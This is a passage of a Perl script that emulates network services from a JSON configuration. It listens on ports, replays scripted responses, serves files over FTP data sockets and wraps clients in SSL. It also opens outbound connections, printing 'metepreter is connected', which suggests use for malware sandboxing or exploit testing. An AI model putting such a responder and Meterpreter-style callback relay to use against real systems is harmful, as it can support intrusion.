439 | 				$tmp = $e->[1];
440 | 				gzip \$tmp => \$value;
441 | 			} else {
442 | 				#print "debug $e->[0]|$e->[1]|\n";
443 | 				$value = pack($e->[0], @{$e}[1 .. 100]);
444 | 			}
445 | 		} elsif ((ref $e) eq "HASH") { #this part is not supported any more
446 | 			if (defined $e->{connect}) {
447 | 				connectTo($e->{connect});
448 | 			} elsif (defined $e->{sendFile}) {
449 | 				sendFileData($ftpDataSock, $e->{sendFile});
450 | 				if ($lastSock ne "") {sendit($lastSock, "200 transfer complete\r\n");}
451 | 				$sendFile = $e->{sendFile};
452 | 				$lastSock = $sock;
453 | 			}
454 | 			next;
455 | 		} else {
456 | 			$value = $e;
457 | 		}
458 | 		if ($pending > 0) {
459 | 			$pending --;
460 | 			if ($pending == 0) {
461 | 				substr($ret, $offset, 0) = length($value);
462 | 			}
463 | 		}
464 | 		$ret .= $value;
465 | 	}
466 | 	return $ret;
467 | }
468 | 
469 | 
470 | sub readCfg {
471 | 	open FD, "service.cfg" || die "Failed to open service.cfg $!\n";
472 | 	read FD, $buff, 0x100000;
473 | 	close FD;
474 | 	my $follow;
475 | 	my $mod;
476 | 	try {
477 | 		$allServices = decode_json($buff);
478 | 		foreach $e (keys %$allServices) {
479 | 			$allServices->{$e}->{name} = $e;
480 | 			$follow = $allServices->{$e}->{follow};
481 | 			if (defined $follow) {
482 | 				$mod = dclone($allServices->{$follow});
483 | 				splice @{$mod->{seq}}, 0,0, @{$allServices->{$e}->{seq}};
484 | 				if (defined $allServices->{$e}->{initMsg}) {
485 | 					$mod->{initMsg} = $allServices->{$e}->{initMsg};
486 | 				}
487 | 				$mod->{name} = $e;
488 | 				$allServices->{$e} = $mod;
489 | 			}
490 | 		}
491 | 	} catch {
492 | 		print "Failed to decode json $_\n";
493 | 		return;
494 | 	};
495 | 	if ($savedActCmd ne "") {
496 | 		processCmd($savedActCmd);
497 | 	}
498 | }
499 | 
500 | sub connectTo {
501 | 	my $dst = shift;
502 | 	my ($dstHost, $port) = split(/:/, $dst);
503 | 	if ($dstHost eq "") {
504 | 		$dstHost = $peerHost;
505 | 		#print "dstHost is now $dstHost\n";
506 | 	}
507 | 	$meteSock = IO::Socket::INET->new( Proto    => 'tcp',
508 |                                  PeerAddr => $dstHost,
509 |                                  PeerPort => $port
510 |                           ) || die "Failed to connect to $dstHost:$port\n";
511 | 	$meteState = 0;
512 | 	$s->add($meteSock);
513 | 	print "metepreter is connected $meteSock\n";
514 | 	$lastTs = getTS();
515 | 	return $meteSock;
516 | }
517 | 
518 | sub readFile {
519 | 	my $fname = shift;
520 | 	my $buff;
521 | 	if (open (FD, $fname)) {
522 | 		read(FD, $buff, 0x1000000);
523 | 		close FD;
524 | 	} else {
525 | 		print "didnto find file $fname $!\n";
526 | 		$buff = "didnot find file $fname";
527 | 	}
528 | 	return $buff;
529 | }
530 | sub sendFileData {
531 | 	my ($sock, $fname) = @_;
532 | 	my $buff;
533 | 	if (open (FD, $fname)) {
534 | 		read(FD, $buff, 0x1000000);
535 | 		close FD;
536 | 	} else {
537 | 		print "didnto find file $fname $!\n";
538 | 		$buff = "didnot find file $fname";
539 | 	}
540 | 	sendit($sock, $buff);
541 | }
542 | 
543 | sub execute {
544 | 	my $a = shift; #action
545 | 	try {
546 | 		if ($a->[0] eq "connect") {
547 | 			#TODO it's not always proper to use ftpDataSock here
548 | 			$ftpDataSock = $sock = connectTo($a->[1]);
549 | 		} elsif ($a->[0] eq "sendFile") {
550 | 			sendFileData($ftpDataSock, $a->[1]);
551 | 		} elsif ($a->[0] eq "send") {
552 | 			sendit($sock, $a->[1]);
553 | 		}
554 | 	} catch {
555 | 		warn "caught error: $_"; 
556 | 	}
557 | }
558 | 
559 | sub sendit {
560 | 	my ($sock, $data) = @_;
561 | 	if ($data =~ /^HTTP\/1\.\d\s+/) {
562 | 		my $offset = index($data, "\r\n\r\n");
563 | 		if ($offset > 0) {
564 | 			my $bodyLen = length($data) - $offset - 4;
565 | 			my $header = substr($data, 0, $offset);
566 | 			my $body = substr($data, $offset);
567 | 			my $pattern = "Content-Length: $bodyLen";
568 | 			$header =~ s/Content-Length:\s*\$/$pattern/;
569 | 			$data = $header . $body;
570 | 		}
571 | 	}
572 | 	if (length($sock) <= 0) {
573 | 		print "closing socket since there is no data to send\n";
574 | 		$s->remove($sock);
575 | 		delete $refs->{$sock};
576 | 		delete $ctx->{$sock};
577 | 		delete $isSSLSock->{$sock};
578 | 		close($sock);
579 | 		return;
580 | 	}
581 | 	if ($showData) {print "sending $_[1]\n";}
582 | 	syswrite($sock, $data);
583 | }
584 | 
585 | use Time::HiRes qw( gettimeofday );
586 | sub getTS {
587 | 	my ($seconds, $microseconds) = gettimeofday;
588 | 	return $seconds + (0.0+ $microseconds)/1000000.0;
589 | }
590 | 
591 | #set up a bunch of sockets
592 | sub setupSocket {
593 | 	my $ports = shift;
594 | 	my $port;
595 | 	my $sock1;
596 | 	foreach $port (keys %$srvSocks) {
597 | 		$sock1 = $srvSocks->{$port};
598 | 		if (! defined $ports->{$port}) {
599 | 			$s->remove($sock1);
600 | 			delete $srvSocks->{$port};
601 | 			delete $isSrvSock->{$sock1};
602 | 			close($sock1);
603 | 		}
604 | 	}
605 | 	my $sock1;
606 | 	foreach $port (keys %$ports) {
607 | 		if (defined $srvSocks->{$port}) { next;}
608 | 		print "listening on port $port\n";
609 | 		$sock1 = IO::Socket::INET->new( Proto    => 'tcp',
610 | 									 LocalAddr => $lhost,
611 | 									 LocalPort => $port,
612 | 									 Reuse     => 1,
613 | 									 Listen    => 10
614 | 							  ) || die "Failed to bind to port $port\n";
615 | 		$srvSocks->{$port} = $sock1;
616 | 		$isSrvSock->{$sock1} = 1;
617 | 		$s->add($sock1);
618 | 	}
619 | }
620 | 
621 | sub check4SSL {
622 | 	my $client = shift;
623 | 	$buffer = "";
624 | 	$s2->add ($client);
625 | 	@readySocks = $s2->can_read(0.5);
626 | 	$s2->remove ($client);
627 | 	if ($#readySocks < 0) { return; }
628 | 	recv($client, $buffer, 1000, MSG_PEEK );
629 | 	if (length($buffer) < 100) {return;}
630 | 	@a = unpack("C*", $buffer);
631 | 	#print "first byte: $a[0]\n";
632 | 	if (($a[0] != 22) || ($a[1] != 3) || ($a[2] > 3)) { 
633 | 		#print "not SSL $a[0]|$a[1]|$a[2]\n";
634 | 		return;}
635 | 	#print "start SSL\n";
636 | 	if (! IO::Socket::SSL->start_SSL( $client,
637 | 		SSL_server => 1,
638 | 		Timeout => 5,
639 | 		SSL_version => 'TLSv1',
640 | 		SSL_cert_file => 'certs/server-cert.pem',
641 | 		SSL_key_file => 'certs/server-key.pem',
642 | 	)) {
643 | 		print "SSL Handshake FAILED - $!\n";
644 | 		return;
645 | 	}
646 | 	$isSSLSock->{$client} = 1;
647 | }
648 | sub input_thread {
649 | 	my $tmp;
650 | 	while (<STDIN>) {
651 | 		chomp($tmp = $_);
652 | 		$threadVar = $tmp;
653 | 	}
654 | }
655 | 
656 | #overcome the problem where on windows, $s->can_read(0.5) will return immediately if $s is empty
657 | sub mySelect {
658 | 	my $timeout = shift;
659 | 	if ($s->count() == 0) {
660 | 		select (undef, undef, undef, $timeout);
661 | 		return ();
662 | 	} else {
663 | 		return $s->can_read($timeout);
664 | 	}
665 | }
666 | 


--------------------------------------------------------------------------------